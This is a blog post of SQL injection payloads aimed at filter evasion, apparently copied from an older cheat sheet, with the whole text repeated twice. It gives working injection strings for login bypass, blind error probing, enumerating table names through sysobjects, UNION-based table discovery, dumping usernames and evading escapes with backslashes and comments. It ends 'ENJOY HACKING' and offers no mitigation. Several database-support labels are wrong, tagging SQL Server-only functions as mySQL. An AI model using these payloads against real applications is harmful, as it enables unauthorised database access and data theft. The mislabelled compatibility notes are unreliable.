By Ankush kumar
Note from the author: If you don't know how SQL Injection works, this page probably won't help you. This page is for people who already understand the basics of SQL Injection attacks but want a deep understanding of the nuances regarding filter evasion. This page will also not show you how to mitigate SQL Injection vectors or how to write the data dumping or DB tampering portion of the attack. It will simply show the underlying methodology and you can infer the rest. This document was built with similar structure to my XSS Cheat Sheet to aid researchers with precise and helpful information. Because this is a living document I suggest you continue to use this site to stay up to date.
I am in need of more versions of different databases. If you have access to a database that is not mentioned below and want to contribute, please email me. If you have an RSS reader feel free to subscribe to my very low volume SQL Injection RSS feed below:
SQL Injection:
Normal SQL Injection:
1 OR 1=1
Database support: [mySQL]
Normal SQL Injection using encapsulated data:
1' OR '1'='1
Database support: [mySQL]
Blind SQL Injection to throw an error to validate that encapsulation isn't working. The goal here is to throw an error to cause the application to show us that it is not encapsulating quotes correctly:
1'1
Database support: [mySQL]
Blind SQL Injection creating an error using EXEC:
1 EXEC SP_ (or EXEC XP_)
Database support: [mySQL]
Blind SQL Injection detection (this shouldn't give us the same result if filtering is in place as we would get if we excluded the AND 1 = 1 part. If it does give us the same result it shows that the application is vulnerable):
1 AND 1=1
Database support: [mySQL]
Blind SQL Injection to attempt to locate tablenames by brute force iteration through potential names (you'll have to rename tablenames until you find a match):
1' AND 1=(SELECT COUNT(*) FROM tablenames); --
Database support: [mySQL]
Using the USER_NAME() function in SQL Server to tell us if the user is running as the administrator:
1 AND USER_NAME() = 'dbo'
Database support: [mySQL | SQL]
Evading escapes with backslashes (this assumes the application comments out a single quote with another single quote and by introducing a backslash before it, it comments out the singlequote that is added by the filter). This type of filter is applied by mySQL's mysql_real_escape_string() and PERL's DBD method $dbh->quote():
\'; DESC users; --
Database support: [mySQL | SQL]
More blind SQL Injection by attempting to create an error using the backslash method seen above:
1\'1
Database support: [mySQL | SQL]
Creating errors by calling fake tables. This can help expose vulnerable applications by attempting to create an error by calling tables that are nonexistant (try this with and without the quotes):
1' AND non_existant_table = '1
Database support: [mySQL | SQL]
Dumping usernames (assuming there is a username table and quotes are not escaped):
' OR username IS NOT NULL OR username = '
Database support: [mySQL | SQL]
Enumerating through database table names. By changing the 116 to different numbers you can use logrithmic reduction to find the first char of the database table name. Then iterating through the first 1 in 1, 1 you can eventually get the whole table name. Originally found by Kevin Spett:
1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
Database support: [mySQL | SQL]
Finding user supplied tables using the sysObjects table in SQL Server:
1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
Database support: [mySQL | SQL]
Bypassing filter evasion using comment tags:
1 UNI/**/ON SELECT ALL FROM WHERE
Database support: [mySQL | SQL]
ENJOY HACKING(ANKUSH)
Note from the author: If you don't know how SQL Injection works, this page probably won't help you. This page is for people who already understand the basics of SQL Injection attacks but want a deep understanding of the nuances regarding filter evasion. This page will also not show you how to mitigate SQL Injection vectors or how to write the data dumping or DB tampering portion of the attack. It will simply show the underlying methodology and you can infer the rest. This document was built with similar structure to my XSS Cheat Sheet to aid researchers with precise and helpful information. Because this is a living document I suggest you continue to use this site to stay up to date.
I am in need of more versions of different databases. If you have access to a database that is not mentioned below and want to contribute, please email me. If you have an RSS reader feel free to subscribe to my very low volume SQL Injection RSS feed below:
SQL Injection:
Normal SQL Injection:
1 OR 1=1
Database support: [mySQL]
Normal SQL Injection using encapsulated data:
1' OR '1'='1
Database support: [mySQL]
Blind SQL Injection to throw an error to validate that encapsulation isn't working. The goal here is to throw an error to cause the application to show us that it is not encapsulating quotes correctly:
1'1
Database support: [mySQL]
Blind SQL Injection creating an error using EXEC:
1 EXEC SP_ (or EXEC XP_)
Database support: [mySQL]
Blind SQL Injection detection (this shouldn't give us the same result if filtering is in place as we would get if we excluded the AND 1 = 1 part. If it does give us the same result it shows that the application is vulnerable):
1 AND 1=1
Database support: [mySQL]
Blind SQL Injection to attempt to locate tablenames by brute force iteration through potential names (you'll have to rename tablenames until you find a match):
1' AND 1=(SELECT COUNT(*) FROM tablenames); --
Database support: [mySQL]
Using the USER_NAME() function in SQL Server to tell us if the user is running as the administrator:
1 AND USER_NAME() = 'dbo'
Database support: [mySQL | SQL]
Evading escapes with backslashes (this assumes the application comments out a single quote with another single quote and by introducing a backslash before it, it comments out the singlequote that is added by the filter). This type of filter is applied by mySQL's mysql_real_escape_string() and PERL's DBD method $dbh->quote():
\'; DESC users; --
Database support: [mySQL | SQL]
More blind SQL Injection by attempting to create an error using the backslash method seen above:
1\'1
Database support: [mySQL | SQL]
Creating errors by calling fake tables. This can help expose vulnerable applications by attempting to create an error by calling tables that are nonexistant (try this with and without the quotes):
1' AND non_existant_table = '1
Database support: [mySQL | SQL]
Dumping usernames (assuming there is a username table and quotes are not escaped):
' OR username IS NOT NULL OR username = '
Database support: [mySQL | SQL]
Enumerating through database table names. By changing the 116 to different numbers you can use logrithmic reduction to find the first char of the database table name. Then iterating through the first 1 in 1, 1 you can eventually get the whole table name. Originally found by Kevin Spett:
1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
Database support: [mySQL | SQL]
Finding user supplied tables using the sysObjects table in SQL Server:
1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
Database support: [mySQL | SQL]
Bypassing filter evasion using comment tags:
1 UNI/**/ON SELECT ALL FROM WHERE
Database support: [mySQL | SQL]
ENJOY HACKING(ANKUSH)
Post a Comment